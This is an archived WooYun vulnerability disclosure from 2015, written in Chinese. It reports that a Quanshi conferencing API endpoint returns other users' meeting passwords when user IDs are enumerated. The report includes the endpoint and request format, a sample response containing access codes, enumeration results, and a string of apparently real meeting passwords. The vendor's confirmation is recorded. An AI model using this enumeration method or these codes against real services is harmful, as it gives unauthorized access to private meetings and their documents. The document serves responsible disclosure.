乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-20: 细节已通知厂商并且等待厂商处理中 2015-08-21: 厂商已经确认,细节仅向厂商公开 2015-08-31: 细节向核心白帽子及相关领域专家公开 2015-09-10: 细节向普通白帽子公开 2015-09-20: 细节向实习白帽子公开 2015-10-05: 细节向公众公开
全时敏感信息泄露#遍历会议密码可以直接进入他人会议
接口信息,post请求
https://uniform.quanshi.com/rest/account/mobile/getConferencePassword
请求参数
{"userId":"1785655"}
遍历userid,部分用户返回报错。这里只看返回值正确, status = 0的用户。某个用户的返回值为
{"status":0,"result":{"id":"201913","billingCode":"61053760","productType":"0","pcode1":"833458466153853602","pcode2":"967178639336346660","identity":"1","userStatus":"82"},"content_type":"application\/json"}
这里进入他人的密码为pcode2 967178639336346660OK 遍历600个用户(自身用户为试用账号,自身id-600)根据返回长度判断是否返回正常
481 1785535 200 false false 764 295 1785349 200 false false 764 293 1785347 200 false false 764 287 1785341 200 false false 764 279 1785333 200 false false 764 313 1785367 200 false false 760 309 1785363 200 false false 760 303 1785357 200 false false 760 283 1785337 200 false false 760 391 1785445 200 false false 756 583 1785637 200 false false 752 459 1785513 200 false false 752 453 1785507 200 false false 752 393 1785447 200 false false 752 267 1785321 200 false false 752 527 1785581 200 false false 748 517 1785571 200 false false 748 501 1785555 200 false false 748 473 1785527 200 false false 748 471 1785525 200 false false 748 469 1785523 200 false false 748 465 1785519 200 false false 748 427 1785481 200 false false 748 401 1785455 200 false false 748 397 1785451 200 false false 748 395 1785449 200 false false 748 389 1785443 200 false false 748 387 1785441 200 false false 748 385 1785439 200 false false 748 383 1785437 200 false false 748 381 1785435 200 false false 748 377 1785431 200 false false 748 375 1785429 200 false false 748 373 1785427 200 false false 748 369 1785423 200 false false 748 367 1785421 200 false false 748 363 1785417 200 false false 748 361 1785415 200 false false 748 337 1785391 200 false false 748 509 1785563 200 false false 747 299 1785353 200 false false 747 271 1785325 200 false false 747 523 1785577 200 false false 744 491 1785545 200 false false 744 477 1785531 200 false false 744 475 1785529 200 false false 744 461 1785515 200 false false 744 455 1785509 200 false false 744 449 1785503 200 false false 744 445 1785499 200 false false 744 443 1785497 200 false false 744 425 1785479 200 false false 744 399 1785453 200 false false 744 371 1785425 200 false false 744 365 1785419 200 false false 744 359 1785413 200 false false 744 285 1785339 200 false false 744 281 1785335 200 false false 744 273 1785327 200 false false 744 413 1785467 200 false false 743 11 1785065 200 false false 743 489 1785543 200 false false 740 431 1785485 200 false false 740 379 1785433 200 false false 740
截图看看
下载PC端
http://dlgray.quanshi.com/demo/faq/download/G-Net_MeetNow_Setup.exe
尝试用其他的会议密码去登录
危害说明:1、随意进入他人会议,那么可以旁观窃取信息、诈骗等等2、共享文档,造成的文档泄露3、其他提供部分会议密码供测试,审核后建议打码
7103412686903751157381753667231198143305
危害等级:中
漏洞Rank:10
确认时间:2015-08-21 10:59
感谢反馈,我们立即处理。
暂无